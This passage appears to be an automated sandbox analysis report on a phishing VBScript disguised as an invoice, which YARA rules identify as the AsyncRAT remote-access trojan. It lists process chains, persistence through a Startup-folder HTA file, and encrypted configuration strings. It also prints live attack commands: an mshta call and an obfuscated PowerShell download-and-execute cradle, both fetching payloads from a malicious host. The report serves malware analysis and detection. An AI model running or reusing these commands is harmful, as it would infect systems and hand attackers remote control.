                  Source: powershell.exe, 00000002.00000002.917290171.000001DEBE1D8000.00000004.00000001.sdmpString found in binary or memory: http://w7icrosoft.comts/MicTiPCA_01.c
                  Source: powershell.exe, 00000002.00000002.917186570.000001DEBE16A000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.905662877.000001DEA5E21000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 00000002.00000003.711520802.000001DEBE2B7000.00000004.00000001.sdmpString found in binary or memory: http://www.microsoft.co
                  Source: powershell.exe, 00000002.00000003.711520802.000001DEBE2B7000.00000004.00000001.sdmpString found in binary or memory: https://certs.godaddy.com/repository/0
                  Source: powershell.exe, 00000002.00000002.915900711.000001DEB5C72000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000002.00000002.915900711.000001DEB5C72000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000002.00000002.915900711.000001DEB5C72000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
                  Source: powershell.exe, 00000002.00000002.917186570.000001DEBE16A000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.905662877.000001DEA5E21000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 00000002.00000002.914665953.000001DEA7869000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
                  Source: powershell.exe, 00000002.00000002.910230199.000001DEA69FC000.00000004.00000001.sdmpString found in binary or memory: https://ia801503.us.archive.org
                  Source: powershell.exe, 00000002.00000002.909879303.000001DEA6964000.00000004.00000001.sdmpString found in binary or memory: https://ia801503.us.archive.org/13/items/startup_20210219/StartuX
                  Source: powershell.exe, 00000002.00000002.909879303.000001DEA6964000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.910230199.000001DEA69FC000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.909554931.000001DEA68B8000.00000004.00000001.sdmpString found in binary or memory: https://ia801503.us.archive.org/13/items/startup_20210219/Startup.txt
                  Source: powershell.exe, 00000002.00000002.909879303.000001DEA6964000.00000004.00000001.sdmpString found in binary or memory: https://ia801503.us.archive.org/13/items/startup_20210219/Startup.txt0y
                  Source: powershell.exe, 00000002.00000002.910230199.000001DEA69FC000.00000004.00000001.sdmpString found in binary or memory: https://ia801503.us.archive.orgx
                  Source: powershell.exe, 00000002.00000002.915900711.000001DEB5C72000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715

                  Key, Mouse, Clipboard, Microphone and Screen Capturing:

                  barindex
                  Yara detected AsyncRATShow sources
                  Source: Yara matchFile source: 00000009.00000002.901879167.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.912905645.000000000B2F1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.913434202.000000000B780000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.745955068.0000000005B56000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.762757327.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 1296, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5764, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 3544, type: MEMORY
                  Source: Yara matchFile source: 5.3.powershell.exe.5bcd1ec.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.powershell.exe.b670778.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.powershell.exe.b6827bc.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.3.powershell.exe.5bcd1ec.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.3.powershell.exe.5bbb094.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.powershell.exe.b6827bc.6.unpack, type: UNPACKEDPE

                  System Summary:

                  barindex
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFA372019782_2_00007FFA37201978
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0715C8A05_2_0715C8A0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07FF04485_2_07FF0448
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07FF31A55_2_07FF31A5
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07FF03E35_2_07FF03E3
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_08107E005_2_08107E00
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_08107E005_2_08107E00
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_08704BE85_2_08704BE8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_087004505_2_08700450
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_087089385_2_08708938
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07158B585_2_07158B58
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07158B685_2_07158B68
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0715EA185_2_0715EA18
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0715EA095_2_0715EA09
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_02A0D5E09_2_02A0D5E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_02A095309_2_02A09530
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_02A08C609_2_02A08C60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_02A0F2989_2_02A0F298
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_02A089189_2_02A08918
                  Source: Invoice-ID-(882451).vbsInitial sample: Strings found which are bigger than 50
                  Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                  Source: dump.pcap, type: PCAPMatched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
                  Source: 00000005.00000003.745729144.0000000005ADD000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
                  Source: 00000005.00000002.906772895.0000000006182000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
                  Source: 00000002.00000002.909879303.000001DEA6964000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
                  Source: Process Memory Space: powershell.exe PID: 5764, type: MEMORYMatched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
                  Source: C:\Users\Public\Microsoft.ps1, type: DROPPEDMatched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
                  Source: 9.2.aspnet_compiler.exe.400000.0.unpack, Client/Settings.csBase64 encoded string: 'jkzA9kYX2/J279kEM5pTk8Do0oQjvH1HBNgMyd2s/83fRjqf98xdZ7gcRHdtaERAk3anO0GY4/MhqSf12vIpbw==', 'QwtFOzaLUYf9WP6up5eTDY8hwr9YYFIUauetjROsO30Of/OtY9lZiyaAkqVWJ6YHXKMGYxLFitF1RGipWVxBM9eMlO92BOypewL4potPiAY=', 'zl+CnYj7GL49NMJx6erBe+3qxptrlXCYW1q/hc1MNEbnREGoYxkN0RLOL6p5jfFIxiHTuKGsAxqwD2a/jvlEWQ==', 'UHXkE6wCIQNgAoWJsiVVI4D25vgewTv36i8RvrVKvZRz/mbk5eBYqVU9/UVZ+5aAZWsrfmRGEY1DkWlaflGDjQ==', 'P4Ll7rC9+Am7AYck3jtBUe5XM5uML+MDdUCbq5vGoo7d8Sccms42hO6nYmVSxM/MlsLg6CddRztmlAOO34k3GjRgKDHWR+n1rMx051Rnucs=', 'mvNgJnmJmLdwiBMZxaYNPKsaS7jQPJirmEznB0Y5ANlMR59y37elA2xSY6U8bMbo0W3waZUro/31L/eNAYYorY5ZPRO9w51hxQJcM2srHj8SSXb6HCbgpKhZvkucYTBnKCVCs/9u4+38y9SOC74/Ogw2YwrWPgyPyOVD38HHjz0zkpgEQKcrZfiwnzHHm7i9n5CyvjEHuA+0YOiS6TK2OPR0PJnXTF52YaNiu/Dt5xbbqypklYTBk84hX8jgXaJlZGPRO+ukAmqf9zKWgl4uYCM00fdwGgpvKKAdDyWHDUwVK4ilDZMqajQ2Erjy6ub+3EGOz3M29u5wtU11vGrJLso5kwg3PxC6T/t8rNc3+9oQbZ7WPCvPYnVgOBR2+pYWlevZ5QPok7D87uxJzgCPbNoAAS85cPilr2WpV+KqIRtcE3ukNSSMpkF/0yV2Fv4UBeZ0B2ilay87uxtmfZaKmUFVbYqlznYe+79uVoYd7DYaPUdpbcnd7+8ySRIaCOqvxg2xEGV5vXl3ySEzGk2oezdkPJ7LT/xeYCysPux2iFKX/ZdXI0DLT8tzaRNnzLOcPinZFI3l3EGujTlcJLZVdkh/1CbURs9vcbypGXTR67EoByAzapGluLTUaqW7hMHtmCZPsaWjQgUxx1jDyrQ/3bF+bHhsZePLHq1bKSVipWczXW54hZpte/mpGDlGiKvi/KJd1G7MU7jo81/a8xmPZVmT5VqzrTjQAEQxrzyDcFQJi/l410FhWnANZMalNZFvxLwpmB6A7pjFVLPOQQZ60a5bnICz33tp+B1ZzrjYU/RTHrOdj58HxSBt/s3KhfOO3KRQZhDjozX3j6AP/qIOaF2JBx5xbSBux+9bzLHIcUIku5bAFc6GDU8ppMDnr7/lTdX9MXynCalyPGCVepNdq6Nn4cOl7ljiM47NRGJnk5YE9dhUKbqIC63UN3XT5YnqsOHQpEtFv++0YPShHo6NRQ==', 'XbpaR9aT8DodKYibQiz2PndcCK2bYFnLWv6CW7QsR8WYpN5fpwkpAQHtBWjaYcjIHhezMoJSwfT/j4PmLEA3yg==', 'tgXpgZ4i0ketHFKLvjTO3WSXezgUac7LE8TAZXH+brG0Ey/zyn2f0AAmzmUIhF1hck7vyBOJV1j5LSUXe2dsRw=='
                  Source: 10.2.aspnet_compiler.exe.400000.0.unpack, Client/Settings.csBase64 encoded string: 'jkzA9kYX2/J279kEM5pTk8Do0oQjvH1HBNgMyd2s/83fRjqf98xdZ7gcRHdtaERAk3anO0GY4/MhqSf12vIpbw==', 'QwtFOzaLUYf9WP6up5eTDY8hwr9YYFIUauetjROsO30Of/OtY9lZiyaAkqVWJ6YHXKMGYxLFitF1RGipWVxBM9eMlO92BOypewL4potPiAY=', 'zl+CnYj7GL49NMJx6erBe+3qxptrlXCYW1q/hc1MNEbnREGoYxkN0RLOL6p5jfFIxiHTuKGsAxqwD2a/jvlEWQ==', 'UHXkE6wCIQNgAoWJsiVVI4D25vgewTv36i8RvrVKvZRz/mbk5eBYqVU9/UVZ+5aAZWsrfmRGEY1DkWlaflGDjQ==', 'P4Ll7rC9+Am7AYck3jtBUe5XM5uML+MDdUCbq5vGoo7d8Sccms42hO6nYmVSxM/MlsLg6CddRztmlAOO34k3GjRgKDHWR+n1rMx051Rnucs=', 'mvNgJnmJmLdwiBMZxaYNPKsaS7jQPJirmEznB0Y5ANlMR59y37elA2xSY6U8bMbo0W3waZUro/31L/eNAYYorY5ZPRO9w51hxQJcM2srHj8SSXb6HCbgpKhZvkucYTBnKCVCs/9u4+38y9SOC74/Ogw2YwrWPgyPyOVD38HHjz0zkpgEQKcrZfiwnzHHm7i9n5CyvjEHuA+0YOiS6TK2OPR0PJnXTF52YaNiu/Dt5xbbqypklYTBk84hX8jgXaJlZGPRO+ukAmqf9zKWgl4uYCM00fdwGgpvKKAdDyWHDUwVK4ilDZMqajQ2Erjy6ub+3EGOz3M29u5wtU11vGrJLso5kwg3PxC6T/t8rNc3+9oQbZ7WPCvPYnVgOBR2+pYWlevZ5QPok7D87uxJzgCPbNoAAS85cPilr2WpV+KqIRtcE3ukNSSMpkF/0yV2Fv4UBeZ0B2ilay87uxtmfZaKmUFVbYqlznYe+79uVoYd7DYaPUdpbcnd7+8ySRIaCOqvxg2xEGV5vXl3ySEzGk2oezdkPJ7LT/xeYCysPux2iFKX/ZdXI0DLT8tzaRNnzLOcPinZFI3l3EGujTlcJLZVdkh/1CbURs9vcbypGXTR67EoByAzapGluLTUaqW7hMHtmCZPsaWjQgUxx1jDyrQ/3bF+bHhsZePLHq1bKSVipWczXW54hZpte/mpGDlGiKvi/KJd1G7MU7jo81/a8xmPZVmT5VqzrTjQAEQxrzyDcFQJi/l410FhWnANZMalNZFvxLwpmB6A7pjFVLPOQQZ60a5bnICz33tp+B1ZzrjYU/RTHrOdj58HxSBt/s3KhfOO3KRQZhDjozX3j6AP/qIOaF2JBx5xbSBux+9bzLHIcUIku5bAFc6GDU8ppMDnr7/lTdX9MXynCalyPGCVepNdq6Nn4cOl7ljiM47NRGJnk5YE9dhUKbqIC63UN3XT5YnqsOHQpEtFv++0YPShHo6NRQ==', 'XbpaR9aT8DodKYibQiz2PndcCK2bYFnLWv6CW7QsR8WYpN5fpwkpAQHtBWjaYcjIHhezMoJSwfT/j4PmLEA3yg==', 'tgXpgZ4i0ketHFKLvjTO3WSXezgUac7LE8TAZXH+brG0Ey/zyn2f0AAmzmUIhF1hck7vyBOJV1j5LSUXe2dsRw=='
                  Source: 9.2.aspnet_compiler.exe.400000.0.unpack, Client/Helper/Methods.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                  Source: 9.2.aspnet_compiler.exe.400000.0.unpack, Client/Helper/Methods.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 10.2.aspnet_compiler.exe.400000.0.unpack, Client/Helper/Methods.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                  Source: 10.2.aspnet_compiler.exe.400000.0.unpack, Client/Helper/Methods.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: classification engineClassification label: mal100.phis.troj.evad.winVBS@18/18@5/3
                  Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUUJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5880:120:WilError_01
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2932:120:WilError_01
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fsrdhrwr.o0u.ps1Jump to behavior
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Invoice-ID-(882451).vbs'
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Invoice-ID-(882451).vbs'
                  Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' http://ahmedadel.work/cairo/Encoding.txt
                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://ahmedadel.work/cairo/ALL.txt'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
                  Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Run.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                  Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file 'C:\Users\Public\Microsoft.ps1
                  Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file C:\Users\Public\Microsoft.ps1
                  Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe #cmd
                  Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe #cmd
                  Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe #cmd
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' http://ahmedadel.work/cairo/Encoding.txtJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://ahmedadel.work/cairo/ALL.txt'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`XJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file C:\Users\Public\Microsoft.ps1Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file 'C:\Users\Public\Microsoft.ps1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe #cmdJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe #cmdJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe #cmdJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                  Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: Binary string: HBAR.pdb81 source: powershell.exe, 00000005.00000002.912905645.000000000B2F1000.00000004.00000001.sdmp
                  Source: Binary string: HBAR.pdb source: powershell.exe, 00000005.00000002.912905645.000000000B2F1000.00000004.00000001.sdmp

                  Data Obfuscation:

                  barindex
                  VBScript performs obfuscated calls to suspicious functionsShow sources
                  Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run hhhbbaannkeerrss , 0IWshShell3.Run("C:\Windows\System32\mshta http://ahmedadel.work/cairo/Encoding.txt", "0")
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0715BE80 push es; ret 5_2_0715BE96

                  Boot Survival:

                  barindex
                  Yara detected AsyncRATShow sources
                  Source: Yara matchFile source: 00000009.00000002.901879167.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.912905645.000000000B2F1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.913434202.000000000B780000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.745955068.0000000005B56000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.762757327.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 1296, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5764, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 3544, type: MEMORY
                  Source: Yara matchFile source: 5.3.powershell.exe.5bcd1ec.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.powershell.exe.b670778.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.powershell.exe.b6827bc.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.3.powershell.exe.5bcd1ec.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.3.powershell.exe.5bbb094.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.powershell.exe.b6827bc.6.unpack, type: UNPACKEDPE
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Run.htaJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Run.htaJump to behavior
                  Source: C:\Windows\System32\mshta.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
